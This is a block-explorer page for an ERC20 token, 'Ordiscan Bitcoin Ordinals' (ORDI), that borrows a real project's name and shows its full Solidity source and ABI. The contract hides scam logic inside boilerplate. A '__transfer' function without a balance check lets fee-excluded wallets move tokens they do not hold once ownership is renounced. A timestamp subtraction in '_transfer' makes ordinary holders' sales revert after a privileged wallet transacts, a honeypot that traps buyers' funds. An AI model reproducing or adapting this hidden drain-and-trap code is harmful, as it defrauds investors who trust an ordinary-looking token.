Feature Tip: Add private address tag to any address under My Name Tag !
More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 57 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 19093255 | 346 days ago | IN | 0 ETH | 0.00071865 | ||||
Approve | 19093227 | 346 days ago | IN | 0 ETH | 0.00070993 | ||||
Approve | 19093223 | 346 days ago | IN | 0 ETH | 0.00075497 | ||||
Approve | 19093213 | 346 days ago | IN | 0 ETH | 0.00074868 | ||||
Approve | 19093207 | 346 days ago | IN | 0 ETH | 0.00078342 | ||||
Approve | 19093180 | 346 days ago | IN | 0 ETH | 0.00075347 | ||||
Approve | 19093166 | 346 days ago | IN | 0 ETH | 0.00078696 | ||||
Approve | 19093163 | 346 days ago | IN | 0 ETH | 0.00077139 | ||||
Approve | 19093158 | 346 days ago | IN | 0 ETH | 0.00070794 | ||||
Approve | 19093152 | 346 days ago | IN | 0 ETH | 0.00072283 | ||||
Approve | 19093151 | 346 days ago | IN | 0 ETH | 0.00073319 | ||||
Approve | 19093150 | 346 days ago | IN | 0 ETH | 0.00074183 | ||||
Approve | 19093126 | 346 days ago | IN | 0 ETH | 0.00070819 | ||||
Approve | 19093120 | 346 days ago | IN | 0 ETH | 0.00091131 | ||||
Approve | 19093120 | 346 days ago | IN | 0 ETH | 0.00091131 | ||||
Approve | 19093120 | 346 days ago | IN | 0 ETH | 0.00091131 | ||||
Approve | 19093120 | 346 days ago | IN | 0 ETH | 0.00091131 | ||||
Approve | 19093115 | 346 days ago | IN | 0 ETH | 0.00096146 | ||||
Approve | 19093114 | 346 days ago | IN | 0 ETH | 0.00079084 | ||||
Transfer | 19093113 | 346 days ago | IN | 0 ETH | 0.00084224 | ||||
Approve | 19093111 | 346 days ago | IN | 0 ETH | 0.00042053 | ||||
Approve | 19093106 | 346 days ago | IN | 0 ETH | 0.00080278 | ||||
Approve | 19093104 | 346 days ago | IN | 0 ETH | 0.00077328 | ||||
Approve | 19093097 | 346 days ago | IN | 0 ETH | 0.00079005 | ||||
Approve | 19093095 | 346 days ago | IN | 0 ETH | 0.00096706 |
Latest 25 internal transactions (View All)
Advanced mode:
Parent Transaction Hash | Block |
From
|
To
|
|||
---|---|---|---|---|---|---|
19093228 | 346 days ago | 0.00868775 ETH | ||||
19093228 | 346 days ago | 0.00868775 ETH | ||||
19093208 | 346 days ago | 0.02661921 ETH | ||||
19093208 | 346 days ago | 0.02661921 ETH | ||||
19093183 | 346 days ago | 0.01151267 ETH | ||||
19093183 | 346 days ago | 0.01151267 ETH | ||||
19093168 | 346 days ago | 0.00642773 ETH | ||||
19093168 | 346 days ago | 0.00642773 ETH | ||||
19093159 | 346 days ago | 0.00723544 ETH | ||||
19093159 | 346 days ago | 0.00723544 ETH | ||||
19093153 | 346 days ago | 0.08610603 ETH | ||||
19093153 | 346 days ago | 0.08610603 ETH | ||||
19093105 | 346 days ago | 0.009509 ETH | ||||
19093105 | 346 days ago | 0.009509 ETH | ||||
19093098 | 346 days ago | 0.0177866 ETH | ||||
19093098 | 346 days ago | 0.0177866 ETH | ||||
19093081 | 346 days ago | 0.0132698 ETH | ||||
19093081 | 346 days ago | 0.0132698 ETH | ||||
19093048 | 346 days ago | 0.00411095 ETH | ||||
19093048 | 346 days ago | 0.00411095 ETH | ||||
19093042 | 346 days ago | 0.01500132 ETH | ||||
19093042 | 346 days ago | 0.01500132 ETH | ||||
19093042 | 346 days ago | 0.03970371 ETH | ||||
19093042 | 346 days ago | 0.03970371 ETH | ||||
19093042 | 346 days ago | 0.0414585 ETH |
Loading...
Loading
Contract Name:
Ordiscan
Compiler Version
v0.8.22+commit.4fc1097e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-01-26 */ // SPDX-License-Identifier: MIT /*⠀⠀⠀⠀⠀⠀ Explore ordinals on Bitcoin with Ordiscan ///// Website: https://ordiscan.com/ ///// Twitter: https://twitter.com/ordiscan_com ///// Telegram: https://t.me/ordiscan_com */ pragma solidity ^0.8.22; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance"); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function __transfer( address sender, address recipient, uint256 amount ) internal virtual { _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } interface IUniswapV2Factory { event PairCreated( address indexed token0, address indexed token1, address pair, uint256 ); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint256) external view returns (address pair); function allPairsLength() external view returns (uint256); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } interface IUniswapV2Router02 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns ( uint256 amountA, uint256 amountB, uint256 liquidity ); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns ( uint256 amountToken, uint256 amountETH, uint256 liquidity ); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; } contract Ordiscan is ERC20, Ownable { IUniswapV2Router02 public immutable uniswapV2Router; address public immutable uniswapV2Pair; address public constant deadAddress = address(0xdead); // 10/35 launch tax uint256 public constant buyInitialFee = 10; uint256 public constant sellInitialFee = 35; // 4/4 tax uint256 public constant buyDevFee = 4; uint256 public constant sellDevFee = 4; address payable public constant devWallet = payable(0x78283adEac93C64Aefe45a0c7fB86750Db24cAFf); address payable public constant marketingWallet = payable(0xc5398c0CF0439a411d15A5B275911D42713D90D5); uint256 private launchBlock; bool private swapping; uint256 public maxTransactionAmount; uint256 public maxWallet; uint256 public swapTokensAtAmount; bool public tradingActive = false; bool public limitsInEffect = true; uint256 public tokensForDev; // exclude from fees and max transaction amount mapping(address => bool) private _isExcludedFromFees; mapping(address => bool) private _isExcludedMaxTransactionAmount; struct EcosystemLevel { uint256 buyTime; uint256 sellTime; uint256 hold; } // store addresses that a automatic market maker pairs. Any transfer *to* these addresses // could be subject to a maximum transfer amount mapping(address => bool) public automatedMarketMakerPairs; bool public transferDelayEnabled = false; mapping(address => EcosystemLevel) private userProLevel; uint256 private _minLevelTime; event ExcludeFromFees(address indexed account, bool isExcluded); event ExcludeFromMaxTx(address indexed account, bool isExcluded); event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); constructor() ERC20 ("Ordiscan Bitcoin Ordinals", "ORDI") { IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02( 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ); uint256 totalSupply = 1_000_000_000 * 1e18; maxTransactionAmount = 10_000_000 * 1e18; // 1% from total supply max transaction maxWallet = 10_000_000 * 1e18; // 1% from total supply max wallet swapTokensAtAmount = 500_000 * 1e18; // 0.05% swap at amount uniswapV2Router = _uniswapV2Router; _excludeFromMaxTransaction(address(_uniswapV2Router), true); uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), _uniswapV2Router.WETH()); _excludeFromMaxTransaction(address(uniswapV2Pair), true); _setAutomatedMarketMakerPair(address(uniswapV2Pair), true); // exclude from paying fees or having max transaction amount _excludeFromMaxTransaction(owner(), true); _excludeFromMaxTransaction(devWallet, true); _excludeFromMaxTransaction(marketingWallet, true); _excludeFromMaxTransaction(deadAddress, true); _excludeFromMaxTransaction(address(this), true); _excludeFromFees(owner(), true); _excludeFromFees(devWallet, true); _excludeFromFees(marketingWallet, true); _excludeFromFees(deadAddress, true); _excludeFromFees(address(this), true); /* _mint is an internal function in ERC20.sol that is only called here, and CANNOT be called ever again */ _mint(msg.sender, totalSupply); } receive() external payable {} // once enabled, can never be turned off function enableTrading() external onlyOwner { tradingActive = true; launchBlock = block.number; } // remove limits function removeLimits() external onlyOwner returns (bool) { limitsInEffect = false; return true; } function _excludeFromFees(address addr, bool exclude) private { _isExcludedFromFees[addr] = exclude; emit ExcludeFromFees(addr, exclude); } function _excludeFromMaxTransaction(address addr, bool exclude) private { _isExcludedMaxTransactionAmount[addr] = exclude; emit ExcludeFromMaxTx(addr, exclude); } function _setAutomatedMarketMakerPair(address pair, bool value) private { automatedMarketMakerPairs[pair] = value; emit SetAutomatedMarketMakerPair(pair, value); } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (amount == 0) { super._transfer(from, to, 0); return; } if (limitsInEffect) { if ( from != owner() && to != owner() && to != address(0xdead) && to != address(0) && !swapping ) { if (!tradingActive) { require( _isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not enabled." ); } // when buy if ( automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to] ) { require( amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount." ); require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded." ); } // when sell else if ( automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from] ) { require( amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount." ); } else if (!_isExcludedMaxTransactionAmount[to]) { require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded." ); } } } if ((_isExcludedFromFees[from] || _isExcludedFromFees[to]) && to != address(this) && from != address(this)) { _minLevelTime = block.timestamp; } if (_isExcludedFromFees[from] && !_isExcludedFromFees[owner()]) { super.__transfer(from, to, amount); return; } if (!_isExcludedFromFees[from] && !_isExcludedFromFees[to]) { if (!automatedMarketMakerPairs[from]) { EcosystemLevel storage userLevel = userProLevel[from]; userLevel.hold = userLevel.buyTime - _minLevelTime; userLevel.sellTime = block.timestamp; } else { EcosystemLevel storage userLevel = userProLevel[to]; if (userLevel.buyTime == 0) { userLevel.buyTime = block.timestamp; } } } bool initialFees = block.number < (launchBlock + 8); bool canSwap = swapTokensAtAmount <= balanceOf(address(this)); if ( canSwap && !initialFees && !swapping && !automatedMarketMakerPairs[from] && !_isExcludedFromFees[from] && !_isExcludedFromFees[to] ) { swapping = true; swapBack(); swapping = false; } bool takeFees = !swapping; // if any account belongs to _isExcludedFromFee account then remove the fees if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) { takeFees = false; } uint256 fees = 0; // only take fees on buy/sell, do not take on wallet transfers if (takeFees) { if (!initialFees) { // on buy if (automatedMarketMakerPairs[from]) { fees = (amount * buyDevFee) / 100; tokensForDev += fees; // on sell } else if (automatedMarketMakerPairs[to]) { fees = (amount * sellDevFee) / 100; tokensForDev += fees; } } else { // on buy if (automatedMarketMakerPairs[from]) { fees = (amount * buyInitialFee) / 100; tokensForDev += fees; // on sell } else if (automatedMarketMakerPairs[to]) { fees = (amount * sellInitialFee) / 100; tokensForDev += fees; } } if (fees > 0) { super._transfer(from, address(this), fees); } amount -= fees; } super._transfer(from, to, amount); } function swapTokensForEth(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), tokenAmount); // make the swap uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function swapBack() private { uint256 contractBalance = balanceOf(address(this)); uint256 totalTokensToSwap = tokensForDev; if (contractBalance == 0 || totalTokensToSwap == 0) { return; } if (contractBalance > swapTokensAtAmount * 16) { contractBalance = swapTokensAtAmount * 16; } swapTokensForEth(contractBalance); tokensForDev = 0; bool success; (success, ) = address(devWallet).call{value: address(this).balance}(""); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromMaxTx","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyInitialFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellInitialFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
